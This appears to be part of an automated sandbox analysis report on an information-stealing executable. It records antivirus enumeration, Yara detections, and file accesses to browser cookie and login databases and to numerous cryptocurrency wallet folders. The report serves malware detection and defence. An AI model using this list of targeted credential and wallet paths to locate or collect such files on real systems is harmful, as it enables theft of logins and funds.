Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 6.0.5BB2.tmp.x.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.2210094647.00000000005D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2209592603.000000000AA42000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 5BB2.tmp.x.exe PID: 5400, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: Yara match File source: Process Memory Space: 5BB2.tmp.x.exe PID: 5400, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 6.0.5BB2.tmp.x.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.2210094647.00000000005D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2209592603.000000000AA42000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 5BB2.tmp.x.exe PID: 5400, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe, type: DROPPED